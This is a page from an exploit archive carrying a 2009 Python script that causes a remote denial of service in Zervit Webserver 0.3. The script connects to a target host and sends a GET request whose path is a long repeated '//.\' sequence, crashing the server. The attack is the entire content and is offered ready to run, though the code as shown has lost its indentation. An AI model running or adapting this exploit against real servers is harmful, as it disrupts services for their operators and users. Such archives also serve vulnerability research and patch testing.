[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zervit Webserver 0.3 Remote Denial Of Service Exploit
# Published : 2009-04-21
# Author : shinnai
# Previous Title : Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service
# Next Title : Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)
import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service "
print " url: http://zervit.sourceforge.net "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://www.shinnai.net "
print " "
print " greets to: e.wiZz! for inspiration. Be safe man... "
print " "
print " dedicated to: all those tried to own my site :-p "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('nnExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('nnUnable to connect. Press "Enter" to quit...')
# www.Syue.com [2009-04-21]